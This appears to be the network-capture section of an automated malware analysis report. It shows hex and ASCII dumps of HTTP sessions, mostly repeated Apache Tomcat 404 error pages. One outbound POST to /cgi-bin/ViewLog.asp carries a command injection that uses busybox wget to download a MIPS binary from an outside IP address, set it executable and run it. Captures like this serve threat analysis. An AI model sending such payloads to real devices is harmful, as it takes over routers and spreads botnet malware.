                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                              Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              135192.168.2.144815262.162.114.1978080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:37.424987078 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:37.644018888 CET1227INHTTP/1.1 404 Not Found
                                              Server: Apache-Coyote/1.1
                                              Content-Type: text/html;charset=utf-8
                                              Content-Language: en
                                              Content-Length: 989
                                              Date: Thu, 23 Nov 2023 04:12:44 GMT
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 37 2e 30 2e 35 39 20 2d 20 45 72 72 6f 72 20 72 65 70 6f 72 74 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 3c 21 2d 2d 48 31 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 48 32 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 48 33 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 42 4f 44 59 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 7d 20 42 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 50 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 41 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 41 2e 6e 61 6d 65 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 48 52 20 7b 63 6f 6c 6f 72 20 3a 20 23 35 32 35 44 37 36 3b 7d 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 20 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 2d 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 68 31 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73 68 61 64 65 22 3e 3c 70 3e 3c 62 3e 74 79 70 65 3c 2f 62 3e 20 53 74 61 74 75 73 20 72 65 70 6f 72 74 3c 2f 70 3e 3c 70 3e 3c 62 3e 6d 65 73 73 61 67 65 3c 2f 62 3e 20 3c 75 3e 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 75 3e 3c 2f 70 3e 3c 70 3e 3c 62 3e 64 65 73 63 72 69 70 74 69 6f 6e 3c 2f 62 3e 20 3c 75 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 75 3e 3c 2f 70 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73 68 61 64 65 22 3e 3c 68 33 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 37 2e 30 2e 35 39 3c 2f 68 33 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                              Data Ascii: <html><head><title>Apache Tomcat/7.0.59 - Error report</title><style>...H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} H3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} BODY {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} B {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} P {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;}A {color : black;}A.name {color : black;}HR {color : #525D76;}--></style> </head><body><h1>HTTP Status 404 - /cgi-bin/ViewLog.asp</h1><HR size="1" noshade="noshade"><p><b>type</b> Status report</p><p><b>message</b> <u>/cgi-bin/ViewLog.asp</u></p><p><b>description</b> <u>The requested resource is not available.</u></p><HR size="1" noshade="noshade"><h3>Apache Tomcat/7.0.59</h3></body></html>
                                              Nov 23, 2023 05:15:38.292680025 CET1227INHTTP/1.1 404 Not Found
                                              Server: Apache-Coyote/1.1
                                              Content-Type: text/html;charset=utf-8
                                              Content-Language: en
                                              Content-Length: 989
                                              Date: Thu, 23 Nov 2023 04:12:44 GMT
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 37 2e 30 2e 35 39 20 2d 20 45 72 72 6f 72 20 72 65 70 6f 72 74 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 3c 21 2d 2d 48 31 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 48 32 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 48 33 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 42 4f 44 59 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 7d 20 42 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 50 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 41 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 41 2e 6e 61 6d 65 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 48 52 20 7b 63 6f 6c 6f 72 20 3a 20 23 35 32 35 44 37 36 3b 7d 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 20 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 2d 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 68 31 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73 68 61 64 65 22 3e 3c 70 3e 3c 62 3e 74 79 70 65 3c 2f 62 3e 20 53 74 61 74 75 73 20 72 65 70 6f 72 74 3c 2f 70 3e 3c 70 3e 3c 62 3e 6d 65 73 73 61 67 65 3c 2f 62 3e 20 3c 75 3e 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 75 3e 3c 2f 70 3e 3c 70 3e 3c 62 3e 64 65 73 63 72 69 70 74 69 6f 6e 3c 2f 62 3e 20 3c 75 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 75 3e 3c 2f 70 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73 68 61 64 65 22 3e 3c 68 33 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 37 2e 30 2e 35 39 3c 2f 68 33 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                              Data Ascii: <html><head><title>Apache Tomcat/7.0.59 - Error report</title><style>...H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} H3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} BODY {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} B {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} P {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;}A {color : black;}A.name {color : black;}HR {color : #525D76;}--></style> </head><body><h1>HTTP Status 404 - /cgi-bin/ViewLog.asp</h1><HR size="1" noshade="noshade"><p><b>type</b> Status report</p><p><b>message</b> <u>/cgi-bin/ViewLog.asp</u></p><p><b>description</b> <u>The requested resource is not available.</u></p><HR size="1" noshade="noshade"><h3>Apache Tomcat/7.0.59</h3></body></html>
                                              Nov 23, 2023 05:15:39.591511011 CET1227INHTTP/1.1 404 Not Found
                                              Server: Apache-Coyote/1.1
                                              Content-Type: text/html;charset=utf-8
                                              Content-Language: en
                                              Content-Length: 989
                                              Date: Thu, 23 Nov 2023 04:12:44 GMT
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 37 2e 30 2e 35 39 20 2d 20 45 72 72 6f 72 20 72 65 70 6f 72 74 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 3c 21 2d 2d 48 31 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 48 32 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 48 33 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 42 4f 44 59 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 7d 20 42 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 50 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 41 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 41 2e 6e 61 6d 65 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 48 52 20 7b 63 6f 6c 6f 72 20 3a 20 23 35 32 35 44 37 36 3b 7d 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 20 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 2d 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 68 31 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73 68 61 64 65 22 3e 3c 70 3e 3c 62 3e 74 79 70 65 3c 2f 62 3e 20 53 74 61 74 75 73 20 72 65 70 6f 72 74 3c 2f 70 3e 3c 70 3e 3c 62 3e 6d 65 73 73 61 67 65 3c 2f 62 3e 20 3c 75 3e 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 75 3e 3c 2f 70 3e 3c 70 3e 3c 62 3e 64 65 73 63 72 69 70 74 69 6f 6e 3c 2f 62 3e 20 3c 75 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 75 3e 3c 2f 70 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73 68 61 64 65 22 3e 3c 68 33 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 37 2e 30 2e 35 39 3c 2f 68 33 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                              Data Ascii: <html><head><title>Apache Tomcat/7.0.59 - Error report</title><style>...H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} H3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} BODY {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} B {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} P {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;}A {color : black;}A.name {color : black;}HR {color : #525D76;}--></style> </head><body><h1>HTTP Status 404 - /cgi-bin/ViewLog.asp</h1><HR size="1" noshade="noshade"><p><b>type</b> Status report</p><p><b>message</b> <u>/cgi-bin/ViewLog.asp</u></p><p><b>description</b> <u>The requested resource is not available.</u></p><HR size="1" noshade="noshade"><h3>Apache Tomcat/7.0.59</h3></body></html>
                                              Nov 23, 2023 05:15:42.191382885 CET1227INHTTP/1.1 404 Not Found
                                              Server: Apache-Coyote/1.1
                                              Content-Type: text/html;charset=utf-8
                                              Content-Language: en
                                              Content-Length: 989
                                              Date: Thu, 23 Nov 2023 04:12:44 GMT
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 37 2e 30 2e 35 39 20 2d 20 45 72 72 6f 72 20 72 65 70 6f 72 74 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 3c 21 2d 2d 48 31 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 48 32 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 48 33 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 42 4f 44 59 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 7d 20 42 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 50 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 41 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 41 2e 6e 61 6d 65 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 48 52 20 7b 63 6f 6c 6f 72 20 3a 20 23 35 32 35 44 37 36 3b 7d 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 20 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 2d 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 68 31 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73 68 61 64 65 22 3e 3c 70 3e 3c 62 3e 74 79 70 65 3c 2f 62 3e 20 53 74 61 74 75 73 20 72 65 70 6f 72 74 3c 2f 70 3e 3c 70 3e 3c 62 3e 6d 65 73 73 61 67 65 3c 2f 62 3e 20 3c 75 3e 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 75 3e 3c 2f 70 3e 3c 70 3e 3c 62 3e 64 65 73 63 72 69 70 74 69 6f 6e 3c 2f 62 3e 20 3c 75 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 75 3e 3c 2f 70 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73 68 61 64 65 22 3e 3c 68 33 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 37 2e 30 2e 35 39 3c 2f 68 33 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                              Data Ascii: <html><head><title>Apache Tomcat/7.0.59 - Error report</title><style>...H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} H3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} BODY {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} B {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} P {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;}A {color : black;}A.name {color : black;}HR {color : #525D76;}--></style> </head><body><h1>HTTP Status 404 - /cgi-bin/ViewLog.asp</h1><HR size="1" noshade="noshade"><p><b>type</b> Status report</p><p><b>message</b> <u>/cgi-bin/ViewLog.asp</u></p><p><b>description</b> <u>The requested resource is not available.</u></p><HR size="1" noshade="noshade"><h3>Apache Tomcat/7.0.59</h3></body></html>
                                              Nov 23, 2023 05:15:47.394591093 CET1227INHTTP/1.1 404 Not Found
                                              Server: Apache-Coyote/1.1
                                              Content-Type: text/html;charset=utf-8
                                              Content-Language: en
                                              Content-Length: 989
                                              Date: Thu, 23 Nov 2023 04:12:44 GMT
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 37 2e 30 2e 35 39 20 2d 20 45 72 72 6f 72 20 72 65 70 6f 72 74 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 3c 21 2d 2d 48 31 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 48 32 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 48 33 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 42 4f 44 59 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 7d 20 42 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 50 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 41 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 41 2e 6e 61 6d 65 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 48 52 20 7b 63 6f 6c 6f 72 20 3a 20 23 35 32 35 44 37 36 3b 7d 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 20 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 2d 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 68 31 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73 68 61 64 65 22 3e 3c 70 3e 3c 62 3e 74 79 70 65 3c 2f 62 3e 20 53 74 61 74 75 73 20 72 65 70 6f 72 74 3c 2f 70 3e 3c 70 3e 3c 62 3e 6d 65 73 73 61 67 65 3c 2f 62 3e 20 3c 75 3e 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 